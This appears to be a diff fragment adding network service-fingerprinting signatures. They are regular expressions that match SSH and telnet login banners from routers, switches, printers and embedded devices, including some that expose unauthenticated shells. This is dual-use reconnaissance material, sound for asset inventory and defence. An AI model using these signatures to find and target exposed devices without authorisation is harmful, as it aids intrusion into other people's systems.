+SSH-([\d.]+)-Foxit-WAC-Server-([\d.]+ Build \d+)\n +SSH-([\d.]+)-ROSSSH\r\n +SSH-([\d.]+)-3Com OS-([\w._-]+ Release \w+)\n +SSH-([\d.]+)-3Com OS-3Com OS V([\w._-]+)\n +SSH-([\d.]+)-XXXX\r\n +SSH-([\d.]+)-xxx\r\n +SSH-([\d.]+)-OpenSSH_([\w._-]+)-HipServ\n +SSH-([\d.]+)-xlightftpd_release_([\w._-]+)\r\n +SSH-([\d.]+)-Serv-U_([\w._-]+)\r\n +SSH-([\d.]+)-CerberusFTPServer_([\w._-]+)\r\n +Soldat Admin Connection Established\.\r\nPassword request timed out\.\r\n +unknown command \r\nunknown command \r\n +\* OK SSP MagniComp SysInfo Server ([\w._-]+)\n +RPY \d \d \. \d \d+\r\nContent-Type: application/beep\+xml\r\n +\0\0\0\x0bSynergy\0\x01\0 +\x80\0\0\\0\0\0\x01I\xae\xeb\xc1\0\0\0\0\0\0\x05\x02\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\x04\0\0\0\" +USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND\n +You are not welcome to use (\w+) from [\w._-]+\.\n +welcome userid=\d+ servername=\"([^"]+)\" motd=\"\" forwarding=\d+ channels=\d+ operators=\d+ maxusers=\d+ protocol=\"([\d.]+)\"\r\n +\xff\xfb\x01\xff\xfb\x03\xff\xfd\x18\xff\xfd\x1f +\xff\xfd\x18\xff\xfb\x01\n\r\n\rPassword: +\xff\xfc\x01\r\nPlease type \[Return\] two times, to initialize telnet configuration\r\nFor HELP type \"\?\"\r\n> +\x1b\[H\x1b\[2JYou have connected to a FirstClass System\. Please login\.\.\.\r\nUserID: +\xff\xfb\x03\xff\xfb\x01\r\nCopyright \d+ Sun Microsystems, Inc\. All rights reserved\.\r\nUse is subject to license terms\.\r\n\r\n\r\nSun\(tm\) Advanced Lights Out Manager ([\d.]+) \(([\w._-]+)\)\r\n\r\nPlease login: +\xff\xfb\x01\xff\xfb\x01Connected to [-/.+\w]+!\r\n\r\nPassword: +220 SL4NT viewer service ready\r\n250 Currently connected channels: +\xff\xfb\x03\xff\xfb\0\xff\xfb\0\xff\xfd\0\xff.*\r\rFrontDoor (\d[-.\w]+)/ +\xff\xfb\x01\xff\xfb\x03\r\nOK\r\n +\xff\xfb\x03\xff\xfd\x03\xff\xfc\x06.*\nPrecidia Technologies\r\n([-.+\w]+) Remote Configuration\r\n\nPassword\? +\xff\xfb\x03\xff\xfd\x03\xff\xfb\x01WinCE/WBT Command Shell Version (\d[-.\w]+)\r\nSerial Number: (\w+) MAC Address: 0000(\w+)\r\nUUID: [-\w]+\r\nPassword: +\xff\xfb\x01\xff\xfd\x03\xff\xfb\x03\x1b\[2J\x1b\[Hname: +\xff\xfb\x01\n\r-> \x08\x08\x08\x08 \*\*\* EPSON Network Scanner Server \((.*)\) \*\*\*\n\r\n\r\x08\x08\x08\x08 \n\r +\xff\xfb\x01\r\nNetportExpress\(tm\) ([-/.+\w]+)\r\n.*\r\n\r\nlogin: +login: \xff\xfd\x03\xff\xfb\x03\xff\xfb\x01 +\xff\xfb\x01\r\npassword: +\xff\xfb\x01\xff\xfd\x18\xff\xfd# +\xff\xfb\x03\xff\xfb\x01\r\nPassword: +\x1b\[20;1H\r\n\r\x1b\[\?25h\x1b\[20;11H\x1b\[21;1HSession Terminated, Connect again\r\n\r\x1b\[\?25h\x1b\[21;1H\xff\xfd\x18\xff\xfb\x01\x1b\[2J\x1b\[\?7l\x1b\[[34];23r\x1b\[\?6l\x1b\[1;1H\x1b\[\?25l\x1b\[1;1HHP [-.\w]+ ProCurve Switch ([-.\w]+)\r\n\rFirmware revision ([-.\w]+)\r\n\r\r +\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\r\n\r\n\r.*Procurve Wireless Access Point (\d+)\r\n +Check Point FireWall-1 Client Authentication Server running on [-.\w]+\r\n\r\xff\xfb\x01\xff\xfe\x01\xff\xfb\x03User: +\xff\xfb\x01\xff\xfb\x03\r\nUsername: +\xff\xfd%\xff\xfb\x01\xff\xfd\x03\xff\xfd\x1f\xff\xfd\0\xff\xfb\0 +\xff\xfd\x03\xff\xfb\x03\xff\xfd'\xff\xfd\x18\xff\xfb\0\xff\xfd\0\xff\xfb\x01\xff\xfe\x01GUI START\n +\xff\xfd'\xff\xfd\x18| p|IBM OS/400 telnetd| o|OS/400 +\xff\xfb\x03\xff\xfb\x01\x07HP JetDirect\r\nPassword is not set\r\n +\xff\xfb\x03\xff\xfb\x01\x07HP JetDirect\r\n\r\nEnter username: +\xff\xfd\x03\xff\xfb\x01\xff\xfd!| p|HP MPE/iX telnetd +\xff\xfb\x01\xff\xfb\x03\xff\xfd\x18\r\n\nIQinVision IQeye3 Version ([vV].*)\n\r\nType HELP +\xff\xfe%\xff\xfd\x18 +\r\nEfficient ([-.\w ]+) Router \(([-.\d/]+)\) v(\d[-.\w]+) Ready\r\n\xff\xfb\x01\xff\xfb\x03\xff\xfd\x01\xff\xfe\x01Login: +\r\nRaptor Firewall Secure Gateway\.\r\n +\r\nSynchronet BBS for Win32 Version (\d[-.\w]+)\r\n +\xff\xfd\x03\xff\xfb\x01\xff\xfb\x03\x1b\[1;1H\x1b\[2K\x1b\[2;1H\x1b\[2K\x1b\[3;1H\x1b.*BayStack ([-\w_.]+) .*HW:(\w+) FW:V([\d.]+) SW:V([\d.]+)\x1b +\xff\xfb\x01\x1b\[2J\x1b\[58259456;1H\x1b\[0m\x1b\[1;1H \*\*\*\*\* \*\*\* \* \* \*\*\*\*\* \*\*\*\*\*\*\*\*\* \*\*\* \*\*\*\*\* \* \*\x1b\[2;1H +\xff\xfb\x01\n\r\n.*Bay Networks (Bay[-.: \w]+)\n\r +Check Point FireWall-1 authenticated Telnet server running on +\xff\xfb\x01\r\n\rType \"\?\" at the command prompt for a list of commands\.\n\r.*Command-> +\xff\xfb\x01\x1b\[0m\x1b\[2J\x1b\[0m\x1b\[9;20HCopyright\(C\) 1995-99 D-Link Systems Inc\.\x1b\[13;30HUser Name\x1b\[14;30HPassword\x1b\[23;10HMAC Address:\x1b\[8;29H([-.\w]+) Console Program\x1b\[13;41H +\xff\xfa\x18\x01\xff\xf0\xff\xfb\x01\xff\xfb\x03Ambit Cable Router\r\n\r\nLogin: +\n\rVina Technologies (.*) \((\d[-.\w]+ build \d+)\) +\xff\xfd\x03\xff\xfb\x03\xff\xfb\x01\x1b\[0m\x1b\[1;1H\x1b\[2J\rD\r \n\r (DES-.*) Command Line Interface\n\r\n +\xff\xfb\x01\xff\xfb\x03\xff\xfc\x1f\n\r\n\rUser Access Verification\n\r\n\r\n\r\n\r\n\rShell version (\d\S+).*Maipu Communication Technology Co\. +\xff\xfb\x01\xff\xfb\x03\xff\xfd\x03\x1b.*Intel Corporation, ([-+. \w()]+) +\r\nFlowPoint/(.*) Ready\r\n.*\xff\xfb\x01\xff\xfb +Tenor Multipath Switch CDR Server\r\nConnected from IpAddr/Port# [\d.]+/\d+ to Port# \d+\r\nPassword: +\xff\xfb\x01\xff\xfb\x03\xff\xfd\x01\x0d\x0a\x0d\x0aCisco\x20Systems.*Console/Telnet Access of the ([-. \w]+) for Configuration Purposes +\xff\xfb\x01\n\r\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08 \x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08 +\r\n\r\nUser Access Verification\r\nPassword:\xff\xfb\x01 +\xff\xfb\x03\xff\xfb\x01\xff\xfb\x03\xff\xfb\x01.*\r\nUser Access Verification\r\n\r\nPassword: +\xff\xfb\x01\r\r\nUser Access Verification\r\r\n\r\r\nUsername: +\xff\xfb\x01\xff\xfb\x03\xff\xfd\x01\r\n\r\nCisco Systems Console\r\n +\xff\xfd\x18 +\xff\xfd\x18\xff\xfd\x1f\xff\xfd#\xff\xfd'\xff\xfd\ +\xff\xfb\x01\n\rUser Name : +\xff\xfd\ +\xff\xfb\x01\xff\xfb\x03\xff\xfe\x01\n\rlogin: +\xff\xfb\x03\xff\xfb\x01\xff\xfd\x1f\r\n\r\nUsername: +\xff\xfd\x18\xff\xfd \xff\xfd#\xff\xfd'\xff\xfd\| p|Openwall GNU/*/Linux telnetd +\xff\xfc\x01\r\nHP JetDirect\r\n\r\nPlease type \"\?\" for HELP, or \"/\" for current settings\r\n> +\xff\xfb\x01\xff\xfb\x03\r\nAXIS (\S+) TELNET +\xff\xfb\x01\xff\xfb\x03\xff\xfd\x03.*?FORE\x20Systems,\x20FORE\x20ES-2810.*?Version (\d[\d\.-]+) +\xff\xfb\x03\xff\xfb\x01.*ForeRunner ES-3810.*Enter Username: +\xff\xfb\x01\r\nCopyright \(C\) 1999 by Extreme Networks\r\r\n +\xff\xfb\x01\xff\xfd\x03\xff\xfb\x03.*?ES-1000\x20Fast\x20Ethernet\x20Switch\x20Console +\xff\xfb\x01\xff\xfd\x01\xff\xfb\x03\xff\xfd\x03\xff\xfb\x05\xff\xfd\x05Welcome to ([-\w_]+) Debug Terminal - \d*\n\r\n\r\n\rlogin: +\x1b\[0m\x1b\[2J\x1b\[01;28HCONEXANT SYSTEMS, INC\.\x1b\[02;19H ACCESS RUNNER ADSL CONSOLE PORT\x1b\[24;01H>>>\x1b\[24;01HLOGON PASSWORD>\x1b\[02;53H3\.\d+\x1b\[24;17H\x1b\[24;17H\x1b\[24;17H\x1b\[24;17H +\xff\xfb\x01\xff\xfb\x03\xff\xfd\x18\xff\xfd\x1f\r\n\r\nWelcome on (.*)\r\n\r\n\r\nUsername: +\xff\xfb\x01\xff\xfd\x18\nTelnet Service on the PrintServer\n\n\rPassword: | p|Hawking/TRENDnet Print Server telnetd +\xff\xfb\x01\xff\xfb\x03\r\n\r\n Welcome to OpenVMS \(TM\) Alpha Operating System, Version V([\d.]+) \r\n\r\n\rUsername: +\xff\xfb\x01\xff\xfb\x03\xff\xfd\x03\xff\xfd\x18\xff\xfd\x1f\xff\xfd \xff\xfd!\x07\r\n\r\n Welcome to OpenVMS \(TM\) Alpha Operating System, Version V([-\w_.]+) \r\n\r\n\rUsername: +\xff\xfd\(| p|IBM OS/390 or SNA telnetd +\xff\xfb\r\nRemotelyAnywhere Telnet Server v([\d.]+)\r\n.*\r\n\r\n([-\w_. ]+) login\r\nuser name: +\xff\xfb\x01\xff\xfb\x03\xff\xfd\x03\xff\xfd\x1f\xff\xfd\x18([^\r\n]+)\r\nRemotelyAnywhere Telnet Server ([\d.]+)\r\n.*\r\n\r\n([-\w_. ]+) login\r\nuser name: +\r\nVxWorks login: \xff\xfb\x01 +\xff\xfb\x01\xff\xfd\x01\xff\xfb\x03\xff\xfd\x03\xff\xfb\x01\xff\xfd\x01\xff\xfb\x03\xff\xfd\x03\r\n\r\nSelect Access Level\r\n===================\r\n1 - Read-Only\r\n2 - Installer\r\n3 - Administrator\r\n13008 >>> +\xff\xfb\x01\xff\xfb\x03\xff\xfd\x18\xff\xfd\x1f\r\nExterior router [-\w_.]+\r\nType: Cisco 2651\r\nModule: E3/T3 interface\r\n\r\n +\xff\xfe\x01\xff\xfb\x01\xff\xfd\x03\xff\xfb\x03\xff\xfd\x18Georgia SoftWorks Telnet Server for Windows NT/2000/XP/2003/Vista Ver\. ([-\w_.]+)\n\r +\xff\xfb\x01\xff\xfb\x03\xff\xfd\x01\r\n\r\nCisco Systems, Inc\. Console\r\n\r\n\r\n\r\r\n\r\nUsername: +\xff\xfb\x01\xff\xfb\x03\r\n\r\n\[ORiNOCO-AP-(\d+)[-\d]*\]> Please enter password: +\xff\xfb\xfd\xff\xfb\x01\n\r\n\rFabric OS \(tm\) Release v([\w.]+)\n\r\n\r +\xff\xfb\x01\xff\xfb\x03\xff\xfd\x18\r\n\nLantronix MSS100 Version V([\d.]+)/\d+\(\d+\)\n\r\nType HELP at the 'Local_2> ' prompt for assistance\.\n\r\n\r\n\nUsername> +\xff\xfb\x01\xff\xfb\x03\xff\xfd\x18\r\0\r\0\r\n\x07# \0 +\xff\xfb\x01OPTIBASE MGW5100 COMMAND LINE INTERFACE\r\n +PC Telnetd ([\d.]+)\r\n\r\nlogin: +rsconfig: port rose not active\n\xff\xfd\"\r\nLinuxNode v([\d.]+) \(([-\w_.]+)\)\r\n\r\nlogin: +\xff\xfd\"\r\nLinuxNode v([\d.]+) \(([-\w_.]+)\)\r\n\r\nlogin: +\xff\xfd\x01\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\r\n\r\n\r\nBusyBox v([-\w_.]+) \([^)]+\) Built-in shell \(ash\)\r\nEnter 'help' for a list of built-in commands\.\r\n\r\n# +\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\n\r\nBusyBox v([-\w_.]+) \([^)]+\) Built-in shell \(ash\)\r\nEnter 'help' for a list of built-in commands\.\r\n\r\n/bin # +\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\n\r\nBusyBox v([-\w_.]+) \([^)]+\) built-in shell \(ash\)\r\nEnter 'help' for a list of built-in commands\.\r\n\r\nermittle die aktuelle TTY\r\ntty is \"/dev/pts/0\"\r\nConsole Ausgaben auf dieses Terminal umgelenkt\r\n# +\xff\xfd\x01\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\n\r\nBusyBox v([-\w_.]+) \(2006\.02\.15-21:18\+0000\) Built-in shell \(msh\)\r\nEnter 'help' for a list of built-in commands\.\r\n\r\n# +\xff\xfb\x01\xff\xfb\x03\xff\xfd\x18\xff\xfd\x1f\r\nRouter> +\xff\xfd\x01\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\nAmiNET\d+ login: +\xff\xfb\x03\xff\xfb\x01\r\n\r\n\x07HP (\w+) Ethernet SNMP Module\r\n ROM B\.([\d.]+)\r\n EEPROM A\.([\d.]+)\r\n HW B\.([\d.]+)\r\n\r\nEnter password: +USR5450 Telnet server v([\d.]+)\n\r\nPassword : +\xff\xfd\x03\xff\xfb\x03\xff\xfd\x01\xff\xfb\x01\d\d-\w+-\d+ \d\d:\d\d:\d\d %MSCM-I-NEWTERM: New TELNET connection from (?:[\d.]+)\r\r\nPassword: +\xff\xfb\x01\xff\xfb\x03\xff\xfd\x18\r\0\n\nLantronix ETS16 Version V([\d.]+)/\d+\(\d+\)\n\r\0\nType HELP at the 'BRTR-ETS16>' prompt for assistance\.\n\r\0\nUsername> +\r\nWelcome to slush\. \(Version ([\d.]+)\)\r\n\r\n\r\n\xff\xfb\x01\xff\xfb\x03([-\w_. ]+) login: +\xff\xfb\x01\xff\xfd\x03\xff\xfb\x03\x1b\[0m\x1b\[2J\x1b\[0m\x1b\[2J\x1b\[2;66H\x1b\[1m\x1b\[21;1H\x1b\[0m-+\x1b\[22;2H\x1b\[0mFunction:\x1b\[23;2H\x1b\[0mMessage:\x1b\[24;2H\x1b\[7mCTRL\+R = Refresh +\x1b\[8;12H\x1b\[0mIBM BladeCenter 4-Port Gb Ethernet Switch Module Console +\xff\xfb\x01\xff\xfe\x01\xff\xfd\x03\xff\xfb\x03\x1b\[0;1H\x1b\[J\x1b\[1;1H\x1b\[0;1H\x1b\[J\x1b\[1;1H\x1b\[0m =+\r\n AT-8326GB Management System Version ([\d.]+) \r\n Remote - Telnet\r\n +\r\nEfficient 5851 SDSL \[ATM\] Router \(5851-\d+\) v([-\d.]+) Ready\r\n\xff\xfb\x01\xff\xfb\x03\xff\xfd\x01\xff\xfe\x01Login: +NPC Telnet permit one connection\.\r\n But One connection\(\) already keep alive\.\r\nGood Bye !! \r\n +\xff\xfb\x01\r\nWelcome to NetLinx v([\d.]+) Copyright AMX Corp\. \d+-\d+\r\n> +\r\nSiemens \d+ T1E1 \[COMBO\] Router \(([-\d]+)\) v([\d.]+) Ready\r\n\xff\xfb\x01\xff\xfb\x03\xff\xfd\x01\xff\xfe\x01Username: +\xff\xfd\x18\xff\xfb\x01\x1b\[2J\x1b\[\?7l\x1b\[4;23r\x1b\[\?6l\x1b\[1;1H\x1b\[\?25l\x1b\[1;1HCopyright \(C\) 1991-1994 Hewlett-Packard Co\. All Rights Reserved\. +\xff\xfc\x01\xff\xfb\x01\xff\xfb\x03\xff\xfd\x18\xff\xfb\x18\xff\xfd\x1f\xff\xfb\x1f\xff\xfb\"\xff\xfb\x05\r\nCLI access not allowed until the SCC is active\.\r\n\r\n +\xff\xfb\x01\n?\r\n\r?VxWorks login: +\xff\xfb\x03\xff\xfb\x01\xff\xfd\x1f\r\nVxWorks login: +\xff\xfb\x01\r\n\rPassword: | p|ZyXEL Prestige/Efficient Speedstream adsl router telnetd +\xff\xfb\x03\xff\xfb\x01password: +\r\n\xff\xfb\x01Enter password: +\xff\xfd\x01\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\r\n\w+ login: +\xff\xfb\x01\xff\xfb\x03\r\n\(\w+\) \r\nUser: +login: \xff\xfb\x01\xff\xfb\x03| p|USRobotics/Sagem router telnetd +\xff\xfb\x01\xff\xfb\x03\xff\xfb\0\xff\xfd\0login: +220 FTP server \(ver 1\.0\) ready\.\r\n +\xff\xfd\x01\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\nBusyBox on dslmodem login: +\xff\xfb\x01\xff\xfd\x03\xff\xfb\x03\xff\xfd\x1f\xff\xfd\x18 +\xff\xfd\x01\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\nlogin: +\r\nSystem unavailable\. Please try later\.\r\n +\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\r\n\r\n(FVS\w+) login: +\xff\xfb\0\xff\xfd\0\xff\xfb\x01\xff\xfd\x01\xff\xfb\x03\xff\xfd\x03Login Name: +\xff\xfb\x01\xff\xfe\"\r\n\* +\xff\xfb\x03\xff\xfb\x01\r\n Disconnecting\.\.\.\r\n\n +\xff\xfb\x01\xff\xfb\x03\x1b\[2J\x1b\[0;0H\x1b\[K\x1b\[7mTelnet configuration RELEASE ([\d.]+)\x1b +Telnet server disabled\r\n +\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\r\n login: +\xff\xfd\x01\xff\xfd\x1f\xff\xfb\x01\xff\xfb\x03\r\r\n([\w._-]+) login: +\xff\xfd\x01\xff\xfd\x1f\xff\xfb\x01\xff\xfb\x03([\w._-]+) login: +\r\n.*Based\(loosely\) on CircleMUD ([\d.]+) +\r\n.*Based on CircleMUD ([\w._-]+),\r\n +\x1b\[0;37;40m\x1b\[2J\x1b\[0;37;40m\x1b\[1m\x1b\[15;22HAT-(\w+), version ([\d.]+)\x1b +\xff\xfb\x01\xff\xfe\x01\xff\xfd\x03\xff\xfb\x03\x1b\[0;0H\x1b\[0J\x1b\[0;0H\x1b\[0J\x1b\[1;28HAT-([-\w_.]+) Login Menu\x1b\[5;18HAT-[-\w_.]+ Local Management System Version ([\d.]+) \x1b +\xff\xfd\x03\xff\xfb\x01\x1b\[2J\x1b\[1;1H\x1b\[0m\x1b\[\?3l\x1b\(0\x1b\[2;40H\x1b\(B\x1b\(0\x1b\[2;28H\x1b\(BCSX([-\w_.]+) Local Management\x1b\[0m\x1b\(0\x1b\[5;24H\x1b\(BCABLETRON Systems, Incorporated\x1b +\xff\xfb\x01\n\rno data rcvd for version string\n\rrecv version id unsuccessful\n\rSSH Session task 0x\w+: Version Exchange Failed\n\r +\r\nSorry, this system is engaged\.\r\n +\xff\xfd\x01\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\nBusyBox on \(none\) login: +\xff\xfd\x01\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\nBusyBox on ([-\w_.]+) login: +\xff\xfd\x01\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\n\r\nBusyBox v([-\w_.]+) \( +\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\r\n\r\n\r\nBusyBox v(.*) Built-in shell \(ash\)\r\n +\xff\xfd\x01\xff\xfd!\xff\xfb\x01\xff\xfb\x03\(none\) login: +\xff\xfb\x01Hummingbird Communications Ltd\., Windows NT, Telnetd Version ([\d.]+) \(([-\w_.]+)\)\r\n\r\n login: +\xff\xfb\x01\xff\xfb\x03\r\nUser Access Verification\r\n\r\nPlease Enter Login Name: +\xff\xfb\x01\xff\xfb\x03\r\nUser Access Verification\r\n\r\nPlease Enter Password: +\xff\xfb\x01\xff\xfb\x03BR-telnet@FI_Core> +\xff\xfd\x01\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\r\n\x1b\[\?3l\x1b\[2JPlease enter your user name and password!! \r\n\r\nLogin: +\xff\xfb\x01\r\nD-Link Access Point login: +\xff\xfd\x01\xff\xfd!\xff\xfb\x01\xff\xfb\x03.*\r\n([-\w_.]+) login: +\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03Login failed\.\r\n +\xff\xfb\x01\xff\xfb\x03\xff\xfd\x18\r\nPON 262194 PAAMCO (TA \w+) Gen3\r\n\n\n\ruser: +\xff\xfd\x03\xff\xfb\x03\xff\xfd\x01\xff\xfb\x01\r\n\r\r\nUser Name: +\xff\xfb\x01\xff\xfd\x03\xff\xfb\x03\n\r +\*+\n\r +Welcome to ([-\w_.]+)\n\r +\*+\n\r\n\rD-Link Corp\., Inc\. Software Release ([-\w_.)(/]+)\n\rCopyright \(c\) \d+-\d+ by D-Link Corp\., Inc\.\n\r\n\rlogin: +\xff\xfb\x03\xff\xfb\x01\xff\xfd\x1f\r\nUsing telnet exposes your password\. Using ssh is a safer choice\.\r\n\r\nUsername: +\xff\xfb\x03\xff\xfb\x01\xff\xfb\x03\xff\xfb\x01\r\n\r\nPIX passwd: +\xff\xfb\x01\r\n#-+\r\n# Tasman Networks Inc\. Telnet Login\r\n# +\xff\xfd\x03\xff\xfb\x01\r\n\r\n\t\tWelcome to P333R\r\n\t\tSW version ([\d.]+)\r\n\r\n\r\nLogin: +\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\r\nPLi dm7000 Helenite \d+ \(based on [-\w_.]+\)\r\n\rwelcome on your dreambox! - Kernel ([-\w_.]+) +\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\r\n\r\n\r[ *\r\n]*Welcome on your dreambox! - Kernel (\d[\w.]+) +\xff\xfe\"\xff\xfb\x01 \x1b\[H\x1b\[J\x1b\[3;1HCB-1000 S/N: (\d+)\x1b\[3;56HSymbol Technologies, Inc\.\x1b\[4;1HVersion ([-\w_.]+)\x1b\[4;44HEthernet HW address ([\w:]+)\x1b\[21;1H +\x1b\[\?25l\xff\xfb\x01\x1b\[2J\x1b\[0m\x1b\[1;1H\x1b\[2;1H\x1b\[3;1H\x1b\[4;1H ### ### ########### ########## ############# ########### ###\x1b\[5;1H #### ### ############# ############ ############# ########### ###\x1b\[6;1H[ #]{70}\x1b\[7;1H[ #]{70}\x1b\[8;1H[ #]{70}\x1b\[9;1H[ #]{70}\x1b\[10;1H[ #]{70}\x1b\[11;1H[ #]{70}\x1b\[12;1H[ #]{78}\x1b\[13;1H[ #]{78}\x1b\[14;1H\x1b\[15;1H\x1b\[16;1HEnter Ctrl-Y to begin\.\x1b\[18;3H\*{35} +\xff\xfb\x01\x1b\[2J\x1b\[0m\x1b\[1;1H \*\*\*\*\* \*\*\* \* \* \*\*\*\*\* \*\*\*\*\*\*\*\*\* \*\*\* +\xff\xfb\x03\xff\xfb\x01\r\n\r\n\*+\r\n\* Welcome to D-Link Wireless Print Server \*\r\n\* +Telnet Console +\*\r\n\*+\r\n\r\nServer Name : ([\w._-]+)\0+\r\nServer Model : ([\w._+-]+)\0+\r\nF/W Version : ([\w._-]+)\0.\0+\r\nMAC Address : ([\w ]+) +\xff\xfb\x01\xff\xfb\x03\r\n\r\n\x1b\[H\x1b\[JWelcome at ActiveFax Server\.\r\n\r\n +\xff\xfb\x01\xff\xfb\x03RemoteX Telnet Server V([\d.]+)\n\r\n\rc:\\> +\xff\xfb\x01\xff\xfd\x03\xff\xfb\x03\n\r +\*+\n\r +Welcome to ZXDSL 831\n\r +\*+\n\r\n\rZTE Corporation, Software Release VIK-([-\w_.]+)\n\r +\*{60}\r\n\r\nThis session allows you to set the TCPIP parameters for your\r\nDell Laser Printer Printer Dell (\w+) MFP Ethernet internal network device, with a hardware\r\naddress of ([0-9A-F:]{17}) \(MSB, Canonical\)\.\r\nIt's an ethernet card\.\r\nNetwork Firmware Version is V([\w._-]+)\(\w+ MFP\) ([\d-]+)\.\r\nSystem Up Time is ([^\r\n.]+)\.\r\n\r\n +\xff\xfb\"\xff\xfb\x03\xff\xfb\x01\xff\xfb\0\xff\xfd\0\n\r\nWelcome to the PDP-10 simulator\r\n\n +\xff\xfb\x01\(Enable\) Password\? +\xff\xfb\x01\xff\xfb\x03\xff\xfd\x18\r\n\r\nCGX3224 Switch Manager Console\. Version: CGX([\d.]+) Bld (\d+),.*\r\n\r\nPassword: +\xff\xfb\x01\xff\xfd\x03\xff\xfb\x03\x1b\[0m\x1b\[2J\x1b\[01;00H\r\n\r\0\r\n\r\0[ \t]+\r\n\r\0\r\n\r\0\r\0VersaXpress HPNA Routing Concentrator\r\n +\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\r\nSportster Pro ([\d.]+) Image Sagem D-BOX2 - Kernel ([-\w_.]+) +\xff\xfb\x01\xff\xfb\x03\r\0\n\*\*\* Lantronix Universal Device Server \*\*\*\r\0\nSerial Number (\d+) MAC address ([\w:]+)\n\r\0Software version 0*([\d.]+) \((\d+)\)\r\0\n\r\0\nPress Enter to go into Setup Mode \r\0\n +\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03Fritz!Box web password: +\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\r\nFritz!Box web password: +\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\r\nDD-WRT v([-\w_+. ]+) Date: +\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\r\nDD-WRT v([^\r\n]+)\r\n +\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03DD-WRT (v\d+)[^\r\n]*\r\nRelease: ([^\r\n]+)\r\n\xff\r\ngateway login: +\xff\xfd\x18\xff\xfd \xff\xfd#\xff\xfd\x1f\xff\xfd'\xff\xfd\ +\xff\xfb\x03\xff\xfb\x01\r\n\r\nU\.S\. Robotics\r\nTotal Control \(tm\) NETServer 8/16\r\n\r\nlogin: | p|USRobotics TotalControl NetServer 8/16 telnetd +\xff\xfb\x01\r\n\r\n\*\*\* ADTRAN TSU ESP \*\*\*\r\n\r\n ENTER PASSWORD -> \xff\xfd\x03\xff\xfb\x03 +\xff\xfb\x01\xff\xfb\x03\xff\xfd\x18\r\n\nLantronix (SCS\d+) Version V([\d/().]+)\n\r\nType HELP +\xff\xfb\x03\xff\xfb\x01\r\n\r\nPassword : +\xff\xfb\x01\xff\xfb\x01\xff\xfb\x01\xff\xfb\x03\xff\xfd\x18\xff\xfd\x1f\r\n\*+\r\n\* Copyright\(c\) 1998-2006 Huawei Technologies Co\., Ltd\. All rights reserved\. \*\r\n +\xff\xfb\x01\xff\xfb\x03\xff\xfd\x03\r\n\r\n\r\nWelcome to X2301 version V\.([-\w_+. ()]+) IPSec from [\d/]+ [\d:]+\r\nsystemname is ([-\w_.]+), +\xff\xfb\x01\xff\xfd\x03\xff\xfb\x03\n\r *\**\n\r *Welcome to Viking II\. \n\r *\**\n\r\n\rGlobespanVirata Inc\., Software Release VIK-([-\w_.]+)\n\r +\xff\xfb\x01\xff\xfe\x01\xff\xfd\x03\xff\xfb\x03\x1b\[1;1H\x1b\[J\x1b\[22;0H>\x1b\[1K\x1b\[999D\r\0login: +\x1b\[2J\x1b\[1;1fATOS Telnet Server\r\n\r\nCTRL\+d to exit\n\r\n\xff\xfb\x01\xff\xfb\x03\xff\xfd\x03Init Command Line Interface\.\. \r\nBoot Version: [\d.]+\r\nBoot Date: [\d :/]+\r\nATOS Version: ([\d.]+) \([^)]+\)\r\nATOS Date: [\d :/]+\r\nHardware: \w+\r\nProduct Code : \d+\r\nSerial Number : (\d+)\r\nLAN0 MAC Address : ([A-F0-9:]+)\r\nADSL Modem SW version: [\w._-]+ *\r\nADSL Modem API version: \d+\r\nADSL Driver version: [\w._-]+\r\n([\w._-]+) release: ([\w._-]+)+\r\nHW encryption not supported\r\nVinetic fw version : [\w._-]+\r\n\r\nUser name : +\xff\xfb\x01\xff\xfe\x01\n\r\n\r\n\r\n\n\n\n\r\t=+\n\r\t +Samsung SWL-6100AP Configuration\n\r\t +\xff\xfb\x01\xff\xfb\x03\r\0\nMAC address (\w+)\n\r\0Software version ([\w._-]+ \(\d+\)) XPTEXE\r\0\n\n\r\0Press Enter to go into Setup Mode \n\r\0 +\xff\xfd\x01\xff\xfd!\xff\xfb\x01\xff\xfb\x03USR ADSL Gateway\r\nLogin: +\xff\xfb\x03\xff\xfb\x01\r\nService Processor login: +\xff\xfd\x01\xff\xfd!\xff\xfb\x01\xff\xfb\x03ADSL2\+ Wireless Router (\w+) \r\nSoftware Version: ([\w.]+)\r\nLogin name: +\xff\xfb\x01Symbol Access Point User/Admin password: 